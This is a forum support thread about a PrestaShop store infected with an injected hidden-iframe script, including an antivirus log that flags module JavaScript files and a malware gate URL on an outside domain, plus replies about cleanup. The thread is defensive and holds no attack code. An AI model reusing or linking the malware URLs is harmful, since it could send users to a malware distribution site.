Antivirus Warning

[ceostos]

Hello,

 

My clients when they try to access my webiste they receive an antivirus warning meaning that within my website they are possible viruses that can infect their computer, creating a little panic to them to come back. Can anyone help me fix this issue ASAP?

 

Thanks,

 

Carlos

[Mike Kranzler]

Hi Carlos,

Can you please post your URL so that we can look into this for you?

 

-Mike

[ceostos]

www.amsigroup.com

[Mike Kranzler]

www.amsigroup.com

 

I just took a look at this, and I'm not getting any warnings at all, everything looks fine on our end. Do you have any idea of how I could replicate this error, or a screenshot or screencast from one of your customers who is getting this warning?

 

-Mike

[ceostos]

Hi Mike,

 

I do not have a copy of it, however my customers are stating the issue, most of them use Mccafee as their antivirus software and according to them the message is like " Webiste not safe" I do not receive the message either but I do not know if this has to do with the type of antivirus. If I happen to receive another message from my customers I will try to have them send me a screenshot of the messeage.

[Mike Kranzler]

Please do so, because we don't have any way of identifying the error otherwise, as nothing is setting off alarms over here. It likely isn't any sort of real issue, but I understand why it could make your customers uncomfortable and will be happy to help you try to find the resolution.

 

-Mike

[ceostos]

Hi Mike,

 

This is the information which one of my clients is receiving from his antivirus when access the website

 

Web Anti-Virus

--------------

Total scanned: 7579

Detected: 5

Start time: 20/01/2012 08:19:40 a.m.

Duration: 05:32:07

 

Detected

--------

Status Object

------ ------

detected: virus HEUR:Trojan.Script.Iframer file: http://amsigroup.com/modules/homecarousel/homecarousel.js

detected: virus HEUR:Trojan.Script.Iframer file: http://amsigroup.com/modules/piscesslider/js/jquery.nivo.slider.pack.js

detected: virus HEUR:Trojan.Script.Iframer file: http://amsigroup.com/modules/homecarousel/jquery.jcarousel.pack.js

detected: malware URL: http://unclesammm.com/gate.php?f=871051

detected: malware URL: http://unclesammm.com/gate.php?f=871051&r=http%3A//www.google.com.pe/url%3Fsa%3Dt%26rct%3Dj%26q%3Damsigroup%26source%3Dweb%26cd%3D3%26ved%3D0CCwQFjAC%26url%3Dhttp%253A%252F%252Famsigroup.com%252F%26ei%3DIIoZT5utLpDrggf-pOyCDA%26usg%3DAFQjCNHT2gzYsSH7U-jLlFov_KLGFVpDEg%26sig2%3DcelyAkEI5Me4_T-gL8_jfA

 

Events

------

Time Name Status Reason

---- ---- ------ ------

20/01/2012 10:54:56 a.m. file: http://amsigroup.com/modules/homecarousel/homecarousel.js detected: virus 'HEUR:Trojan.Script.Iframer' (modification)

20/01/2012 10:54:56 a.m. file: http://amsigroup.com/modules/homecarousel/homecarousel.js access blocked

20/01/2012 10:54:56 a.m. file: http://amsigroup.com/modules/piscesslider/js/jquery.nivo.slider.pack.js detected: virus 'HEUR:Trojan.Script.Iframer' (modification)

20/01/2012 10:54:56 a.m. file: http://amsigroup.com/modules/piscesslider/js/jquery.nivo.slider.pack.js access blocked

20/01/2012 10:54:56 a.m. file: http://amsigroup.com/modules/homecarousel/jquery.jcarousel.pack.js detected: virus 'HEUR:Trojan.Script.Iframer' (modification)

20/01/2012 10:54:56 a.m. file: http://amsigroup.com/modules/homecarousel/jquery.jcarousel.pack.js access blocked

20/01/2012 10:55:00 a.m. URL: http://unclesammm.com/gate.php?f=871051 Base of suspicious web addresses: detected

20/01/2012 10:55:00 a.m. URL: http://unclesammm.com/gate.php?f=871051&r=http%3A//www.google.com.pe/url%3Fsa%3Dt%26rct%3Dj%26q%3Damsigroup%26source%3Dweb%26cd%3D3%26ved%3D0CCwQFjAC%26url%3Dhttp%253A%252F%252Famsigroup.com%252F%26ei%3DIIoZT5utLpDrggf-pOyCDA%26usg%3DAFQjCNHT2gzYsSH7U-jLlFov_KLGFVpDEg%26sig2%3DcelyAkEI5Me4_T-gL8_jfA Base of suspicious web addresses: detected

20/01/2012 10:55:00 a.m. URL: http://unclesammm.com/gate.php?f=871051 Base of suspicious web addresses: access blocked

20/01/2012 10:55:00 a.m. URL: http://unclesammm.com/gate.php?f=871051&r=http%3A//www.google.com.pe/url%3Fsa%3Dt%26rct%3Dj%26q%3Damsigroup%26source%3Dweb%26cd%3D3%26ved%3D0CCwQFjAC%26url%3Dhttp%253A%252F%252Famsigroup.com%252F%26ei%3DIIoZT5utLpDrggf-pOyCDA%26usg%3DAFQjCNHT2gzYsSH7U-jLlFov_KLGFVpDEg%26sig2%3DcelyAkEI5Me4_T-gL8_jfA Base of suspicious web addresses: access blocked

20/01/2012 10:55:43 a.m. URL: http://unclesammm.com/gate.php?f=871051 Base of suspicious web addresses: detected

20/01/2012 10:55:43 a.m. URL: http://unclesammm.com/gate.php?f=871051 Base of suspicious web addresses: access blocked

20/01/2012 10:56:06 a.m. URL: http://unclesammm.com/gate.php?f=871051 Base of suspicious web addresses: detected

20/01/2012 10:56:06 a.m. URL: http://unclesammm.com/gate.php?f=871051 Base of suspicious web addresses: access blocked

20/01/2012 01:01:23 p.m. file: http://amsigroup.com/modules/piscesslider/js/jquery.nivo.slider.pack.js detected: virus 'HEUR:Trojan.Script.Iframer' (modification)

20/01/2012 01:01:23 p.m. file: http://amsigroup.com/modules/piscesslider/js/jquery.nivo.slider.pack.js access blocked

20/01/2012 01:01:24 p.m. file: http://amsigroup.com/modules/homecarousel/homecarousel.js detected: virus 'HEUR:Trojan.Script.Iframer' (modification)

20/01/2012 01:01:24 p.m. file: http://amsigroup.com/modules/homecarousel/homecarousel.js access blocked

20/01/2012 01:01:24 p.m. file: http://amsigroup.com/modules/homecarousel/jquery.jcarousel.pack.js detected: virus 'HEUR:Trojan.Script.Iframer' (modification)

20/01/2012 01:01:24 p.m. file: http://amsigroup.com/modules/homecarousel/jquery.jcarousel.pack.js access blocked

20/01/2012 01:01:24 p.m. URL: http://unclesammm.com/gate.php?f=871051 Base of suspicious web addresses: detected

20/01/2012 01:01:24 p.m. URL: http://unclesammm.com/gate.php?f=871051 Base of suspicious web addresses: access blocked

20/01/2012 01:01:45 p.m. file: http://amsigroup.com/modules/homecarousel/homecarousel.js detected: virus 'HEUR:Trojan.Script.Iframer' (modification)

20/01/2012 01:01:45 p.m. file: http://amsigroup.com/modules/homecarousel/homecarousel.js access blocked

20/01/2012 01:01:45 p.m. file: http://amsigroup.com/modules/piscesslider/js/jquery.nivo.slider.pack.js detected: virus 'HEUR:Trojan.Script.Iframer' (modification)

20/01/2012 01:01:45 p.m. file: http://amsigroup.com/modules/piscesslider/js/jquery.nivo.slider.pack.js access blocked

20/01/2012 01:01:45 p.m. file: http://amsigroup.com/modules/homecarousel/jquery.jcarousel.pack.js detected: virus 'HEUR:Trojan.Script.Iframer' (modification)

20/01/2012 01:01:45 p.m. file: http://amsigroup.com/modules/homecarousel/jquery.jcarousel.pack.js access blocked

20/01/2012 01:01:45 p.m. URL: http://unclesammm.com/gate.php?f=871051 Base of suspicious web addresses: detected

20/01/2012 01:01:45 p.m. URL: http://unclesammm.com/gate.php?f=871051 Base of suspicious web addresses: access blocked

20/01/2012 01:02:38 p.m. file: http://amsigroup.com/modules/homecarousel/homecarousel.js detected: virus 'HEUR:Trojan.Script.Iframer' (modification)

20/01/2012 01:02:38 p.m. file: http://amsigroup.com/modules/homecarousel/homecarousel.js access blocked

20/01/2012 01:02:38 p.m. file: http://amsigroup.com/modules/homecarousel/jquery.jcarousel.pack.js detected: virus 'HEUR:Trojan.Script.Iframer' (modification)

20/01/2012 01:02:38 p.m. file: http://amsigroup.com/modules/homecarousel/jquery.jcarousel.pack.js access blocked

20/01/2012 01:02:38 p.m. file: http://amsigroup.com/modules/piscesslider/js/jquery.nivo.slider.pack.js detected: virus 'HEUR:Trojan.Script.Iframer' (modification)

20/01/2012 01:02:38 p.m. file: http://amsigroup.com/modules/piscesslider/js/jquery.nivo.slider.pack.js access blocked

20/01/2012 01:02:38 p.m. URL: http://unclesammm.com/gate.php?f=871051 Base of suspicious web addresses: detected

20/01/2012 01:02:38 p.m. URL: http://unclesammm.com/gate.php?f=871051 Base of suspicious web addresses: access blocked

20/01/2012 01:11:59 p.m. URL: http://unclesammm.com/gate.php?f=871051 Base of suspicious web addresses: detected

20/01/2012 01:11:59 p.m. URL: http://unclesammm.com/gate.php?f=871051 Base of suspicious web addresses: access blocked

20/01/2012 01:48:31 p.m. file: http://amsigroup.com/modules/homecarousel/homecarousel.js detected: virus 'HEUR:Trojan.Script.Iframer' (modification)

20/01/2012 01:48:31 p.m. file: http://amsigroup.com/modules/homecarousel/homecarousel.js access blocked

20/01/2012 01:48:31 p.m. file: http://amsigroup.com/modules/piscesslider/js/jquery.nivo.slider.pack.js detected: virus 'HEUR:Trojan.Script.Iframer' (modification)

20/01/2012 01:48:31 p.m. file: http://amsigroup.com/modules/piscesslider/js/jquery.nivo.slider.pack.js access blocked

20/01/2012 01:48:31 p.m. file: http://amsigroup.com/modules/homecarousel/jquery.jcarousel.pack.js detected: virus 'HEUR:Trojan.Script.Iframer' (modification)

20/01/2012 01:48:31 p.m. file: http://amsigroup.com/modules/homecarousel/jquery.jcarousel.pack.js access blocked

20/01/2012 01:48:32 p.m. URL: http://unclesammm.com/gate.php?f=871051 Base of suspicious web addresses: detected

20/01/2012 01:48:32 p.m. URL: http://unclesammm.com/gate.php?f=871051 Base of suspicious web addresses: access blocked

 

Settings

--------

Parameter Value

--------- -----

Security Level Recommended

Action Block

Check if URLs are listed in the base of suspicious web addresses Yes

Check if URLs are listed in the base of phishing web addresses Yes

Heuristic analyzer level Medium

Fragment caching timeout 1 sec

 

Please let me know what we can do to fix it.

 

Thanks so much for your help,

 

Carlos

[Mike Kranzler]

Hi Carlos,

I am passing this along to our development team, who will look into this for you. I will let you know as soon as I have any additional information.

 

-Mike

[ceostos]

Thank you Mike,

 

I would really appreciate a prompt solution to this problem since I have been receiving a lot of complaints now.

 

Carlos

[Mike Kranzler]

When did the complaints start exactly? And had you made any changes, additions or new module purchases right before then?

 

-Mike

[ceostos]

The complaints, start happening last week but I did not pay that much of attention since it was so random and coming from one of my employees but now I see it coming more and more frequent. I purchased the newsletter module but I don't think is related to the virus.

 

Thanks Mike for anything you can do to help me solve this issue.

 

Carlos

[Mike Kranzler]

The complaints, start happening last week but I did not pay that much of attention since it was so random and coming from one of my employees but now I see it coming more and more frequent. I purchased the newsletter module but I don't think is related to the virus.

 

Thanks Mike for anything you can do to help me solve this issue.

 

Carlos

 

Which newsletter module specifically? And where did you purchase it

 

-Mike

[ceostos]

deep newsletter

 

prestashop

[Mike Kranzler]

I looked into this a little deeper for you, and it does appear that somehow your site has been infected with malware from a site called unclesammm DOT com. This isn't a site that has ever caused one of our users issues in the past, so unfortunately I don't know what to suggest at the moment other than backing up everything and trying a clean reinstall.

 

As I mentioned, I am passing this along to our development team, but I don't know how quickly they'll be able to come back with a response, it really depends on how this may have happened in the first place.

 

You can see where I found the vulnerability below:

 

 

You'll see that it presents as a hidden iframe with dimensions of 0 x 0 in the corner of your site, so it is not really intended to be found very easily.

 

I will let you know as soon as I have any additional information on this for you.

 

-Mike

[ceostos]

How can I backup the information and reinstall the system? I purchase the template a month ago through monstertemplates.com which included the installation of the website. I do not have enough computer knowledge to do all this, Do you know how can I reinstall the template? I would like to take a quick action so I can have my website ready again for my clients.

 

Thanks,

 

Carlos

[Mike Kranzler]

Hi Carlos,

You can back up your database through your Back Office by going to Tools > DB Backup. You can also back up all of your files by copying them to your desktop via FTP, and then compressing them all into a zipped folder to save room, but be careful with that, because the unclesammm code is likely inside of one of those files and you wouldn't want to add it again .

 

And I'm assuming you mean templatemonster.com, they would be the best ones to contact to get help with their template again.

 

-Mike

[Carolina Custom Designs]

Hi Carlos & Mike!

 

Something very similar to this happened to my site about a month ago. It was very painful to deal with and my site was down nearly a week. I highly recommend you disable your site because if Google crawls your site they will blacklist your site and it is very hard to get that removed. I was finally able to get rid of the malicious script on my site but it cost me a bunch of time (and probably business).

 

I learned alot going through that process and would be happy to help if needed.

 

Marty Shue

[Mike Kranzler]

As always, thanks Marty! Do you have any idea where you may have picked up that script in the first place?

 

-Mike

[Carolina Custom Designs]

No, we were never able to determine where or how the script managed to get on my server. I worked with my web host but we could not determine where it came from. It infected my whole server and each of my 4 sites. Basically, we had to manually go through each file and remove the script. The malicious script I had would regenerate itself upon page load if you missed any part of the script. This was very frustrating! I would get one site clean only to come back an hour or so later to find that it had been infected again.

 

We finally found and removed all the scripts but, as I said, it took a lot of time and effort.

 

Marty Shue

[Mike Kranzler]

Wow, well I'm glad you were able to finally fix it! Carlos, Marty is one of our PrestaShop Certified Developers, so he is definitely someone you can count on to help you out with your site.

 

-Mike

[ceostos]

Hi Marty,

 

Can you please help me? I must let you know that I do not have any experience in coding or fixing computing issues of any nature. I would really appreciate if you can walk me through this issue at you earliest convenience. Thank you Mike for following up with my current issue.

 

Thanks,

 

Carlos

[ceostos]

To whom it may concern,

 

I am still waiting for someone to help me with this virus situation, I still haven't be able to use my website due to virus and is already been more than I week that I am trying to have someone to help me fix this problem. Any help is truly appreciated.

 

Thanks,

 

Carlos

[jamieshankland]

Similar thing happend to me, my website was hacked and they installed some sort of script and google was picking it up as containing virus's, I never did get to the bottom of it but maybe its a case of this?

[Mike Kranzler]

Hi Jamie,

What version of PrestaShop are you running?

 

-Mike